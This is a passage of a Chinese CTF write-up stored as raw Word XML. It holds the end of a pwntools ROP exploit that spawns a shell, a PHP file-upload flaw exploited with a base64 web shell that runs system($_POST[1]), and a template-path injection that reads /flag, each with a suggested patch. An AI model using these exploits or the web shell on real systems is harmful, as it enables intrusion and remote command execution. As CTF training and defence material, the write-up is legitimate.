              <w:t>']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404600C4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success(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"LBASE @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libc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-&gt; %#x"%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lbase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5898299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6081074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= p64(lbase+0x9d661)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5102400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pop_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rdi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>p64(lbase+0x1b3e9a)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5F670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ppop_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rsi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>p64(0)+p64(canary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D00FFA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lbase+lpop_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rdx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>p64(0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5D0175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lbase+lpop_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0DEA80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payload += p64(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lbase+syscall</w:t>
            </w:r>
            <w:proofErr w:type="spell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79EA1A3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</w:p>
          <w:p w14:paraId="24FCE1D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io.sendline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(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14719728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io.recvuntil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('(enter to pass):')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C0920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io.send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("\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAEEEBC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io.interactive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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3409741F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gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>exit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B88A39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except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Exception,e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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679B990D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log.critical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(str(Exception)+str(e))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="574B7A96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 xml:space="preserve">        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io.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AAB7CB" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00C038B5" w:rsidRDefault="000C39FB" w:rsidP="00414E95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>#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gcc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mislead.c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-o mislead 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fPIC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-pie -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Wl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>z,now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Wl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,-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z,relro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Bstatic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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>l:libcjson.a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> -L .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="661F4722" w14:textId="5AC18664" w:rsidR="000C39FB" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4D8584" w14:textId="77777777" w:rsidR="00C038B5" w:rsidRPr="00372828" w:rsidRDefault="00C038B5" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D2B81C" w14:textId="7622EC1E" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39F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/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>粤湾基金</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDC524" w14:textId="77777777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考点：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文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0CE0B" w14:textId="77777777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漏洞点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD5F47" w14:textId="77777777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application/home/controller/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Uploadify.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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中的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preview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函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519CF41E" w14:textId="329F58DF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182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行开始：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1430" w:rsidRPr="00EF164C" w14:paraId="22F12B2E" w14:textId="77777777" w:rsidTr="00CA1430">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703D071D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$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src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 xml:space="preserve"> = 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file_get_contents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('php://input');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7046D234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if (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preg_match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("#^</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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data:image</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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/(\w+);base64,(.*)$#", $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src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, $matches)</w:t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) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FAF9A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sprintf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</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2248FACD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"%s://%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s%s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",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64CA509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isset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($_SERVER['HTTPS']) &amp;&amp; $_SERVER['HTTPS'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] !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= 'off' ? 'https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 :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'http',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408324BF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$_SERVER['HTTP_HOST'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],$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_SERVER['REQUEST_URI']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02259672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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77094BD5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= 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str_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replace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preview.php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", "", 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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AAF21F8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$base64 = $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matches[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2];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB6EDC0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ab/>
              <w:t>$type = $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matches[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1];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63CBC39A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if ($type === 'jpeg') {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1BD7A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$type = 'jpg';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162D841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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B31B023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</w:p>
          <w:p w14:paraId="6C3F0E9F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if(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strtolower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($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type)=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='php'){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A20D6C8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ab/>
              <w:t xml:space="preserve">    die('hacked!');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68DC9B95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 xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="724996AA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</w:p>
          <w:p w14:paraId="0C25FB69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$filename = md5($base64).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".$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type";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282AA42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ab/>
              <w:t>$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 xml:space="preserve"> = $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DIR.DIRECTORY_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SEPARATOR.$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filename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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E8C1DE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</w:p>
          <w:p w14:paraId="2A6216A0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if (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file_exists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)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100ABBB7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die(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'{"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jsonrpc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 : "2.0", "result" : "'.$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.'preview/'.$filename.'", "id" : "id"}');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D008D1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} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75EEE947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$data = base64_decode($base64);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69784133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ab/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file_put_</w:t>
            </w:r>
            <w:proofErr w:type="gram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contents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</w:t>
            </w:r>
            <w:proofErr w:type="gram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$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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, $data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456A3DD5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die(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'{"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jsonrpc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 : "2.0", "result" : "'.$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.'preview/'.$filename.'", "id" : "id"}');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D2FB55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  <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1400B563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} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3B51B5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ab/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die(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'{"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jsonrpc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" : "2.0", "error" : {"code": 100, "message": "un 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recoginized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source"}}');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B756D5C" w14:textId="1C548C11" w:rsidR="00CA1430" w:rsidRPr="00EF164C" w:rsidRDefault="00CA1430" w:rsidP="000C39F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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DD15407" w14:textId="77777777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利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A914C" w14:textId="00D14704" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="002A14A3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文件</w:t>
      </w:r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application/home/controller/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Uploadify.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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对应</w:t>
      </w:r>
      <w:r w:rsidR="000C39FB"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路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4EC9E" w14:textId="2FE0CCEA" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="0087310E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t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Uploadify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/preview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F566BB3" w14:textId="067FDABD" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="00932E1F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访问上面的链接并</w:t>
      </w:r>
      <w:r w:rsidR="000C39FB" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="000C39FB"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过去：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28409D99" w14:textId="60CF5843" w:rsidR="000C39FB" w:rsidRPr="00372828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Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>data:image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/php3;base64,</w:t>
      </w:r>
      <w:r w:rsidR="00C3019E" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PD9waHAgQHN5c3RlbSgkX1BPU1RbMV0pOyA/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C3019E" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C3019E" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidR="00DE13D7" w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47721AC4" wp14:editId="7A44C44A">
            <wp:extent cx="5274310" cy="18516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CB2D" w14:textId="3D211B27" w:rsidR="000C39FB" w:rsidRPr="00372828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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>然后访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B73F8" w14:textId="4E4E552F" w:rsidR="00DE13D7" w:rsidRPr="00372828" w:rsidRDefault="00DE13D7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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/preview/cdb892d473944c958369cac8cd57c8eb.php3</w:t>
      </w:r>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidR="00210C8A" w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864F952" w14:textId="18C2B970" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="00DE13D7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Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0150BF67" wp14:editId="41D5EC35">
            <wp:extent cx="5274310" cy="16040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BF84" w14:textId="77777777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修补方案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1C2356D5" w14:textId="728E3B58" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39F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生成随机文件名、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file_put_content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()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、修改权限、返回文件名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1430" w:rsidRPr="00EF164C" w14:paraId="25E35A04" w14:textId="77777777" w:rsidTr="00CA1430">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40DFE426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$filename = md5($base64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).rand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().".$type";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68404C63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= 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DIR.DIRECTORY_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SEPARATOR.$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filename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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BF4FDB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$data = base64_decode($base64);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17672887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file_put_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contents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, $data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8A7DB6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if(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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chmod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($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, 0444)){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B059193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   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die(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'{"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jsonrpc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 : "2.0", "result" : "'.$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previewUrl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.'preview/'.$filename.'", "id" : "id"}');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FAE81F4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}else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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BC4768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   unlink($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filePath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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060C2B7D" w14:textId="77777777" w:rsidR="00CA1430" w:rsidRPr="00EF164C" w:rsidRDefault="00CA1430" w:rsidP="00CA1430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   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die(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'{"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jsonrpc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" : "2.0", "error" : {"code": 101, "message": "upload error"}}');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4EA381" w14:textId="70C768CC" w:rsidR="00CA1430" w:rsidRPr="00EF164C" w:rsidRDefault="00CA1430" w:rsidP="000C39FB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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17967BC4" w14:textId="2E26BC66" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0BB621" w14:textId="64CA590F" w:rsidR="00210C8A" w:rsidRPr="00372828" w:rsidRDefault="00210C8A" w:rsidP="00210C8A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/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>粤湾投资</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56E39C" w14:textId="77777777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考点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SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0666A66D" w14:textId="31C23B63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漏洞点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Apps/Home/Controller/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JqueryController.class.php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96D" w:rsidRPr="0021196D" w14:paraId="6FC7D916" w14:textId="77777777" w:rsidTr="0021196D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C27DBE8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namespace Home\Controller;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402C1E23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class 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JqueryController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extends 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CommonController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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="778CE9CC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public function </w:t>
            </w:r>
            <w:proofErr w:type="gram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index(</w:t>
            </w:r>
            <w:proofErr w:type="gram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){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F22314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 xml:space="preserve">        if</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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(!</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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($_GET['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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template_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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'])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B38ACBB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        $this-&gt;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seoData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= array('title' =&gt; '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Jquery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插件</w:t>
            </w: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', 'keywords' =&gt; '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Jquery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插件</w:t>
            </w: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', 'description' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spell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Jquery</w:t>
            </w:r>
            <w:proofErr w:type="spell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插件</w:t>
            </w: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');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38473C27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        $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gram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display(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDB832E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    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43443B7A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    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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else{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2BAA80E7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 xml:space="preserve">            $this-&gt;display($_GET['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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template_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0021196D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FDA414"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>']);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471FDFA1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    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD308CB" w14:textId="77777777" w:rsidR="0021196D" w:rsidRPr="0021196D" w:rsidRDefault="0021196D" w:rsidP="0021196D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 xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7259881E" w14:textId="5A45C119" w:rsidR="0021196D" w:rsidRPr="0021196D" w:rsidRDefault="0021196D" w:rsidP="00210C8A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21196D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FEA5062" w14:textId="77777777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利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92F830" w14:textId="1899CB7B" w:rsidR="00E16578" w:rsidRPr="00EF164C" w:rsidRDefault="00E16578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 w:hint="eastAsia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将/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flag</w:t>
      </w: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直接作为模板进行渲染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A7268" w14:textId="69B9B94A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index.php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Jquery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index?template_file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=/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3B91A" w14:textId="7A98940C" w:rsidR="00210C8A" w:rsidRPr="00EF164C" w:rsidRDefault="00545BE9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Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A747E21" wp14:editId="4E659FB1">
            <wp:extent cx="5274310" cy="12204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F290" w14:textId="77777777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修补方案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0366492B" w14:textId="6C69A89A" w:rsidR="00210C8A" w:rsidRPr="00EF164C" w:rsidRDefault="00210C8A" w:rsidP="00210C8A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判断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$_GET['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template_file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']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的路径是不是在模板文件</w:t>
      </w:r>
      <w:r w:rsidR="00FC196F"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的目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F16641B" w14:textId="5CBE52B0" w:rsidR="00210C8A" w:rsidRPr="00372828" w:rsidRDefault="00210C8A">
      <w:pPr>
        <w:rPr>
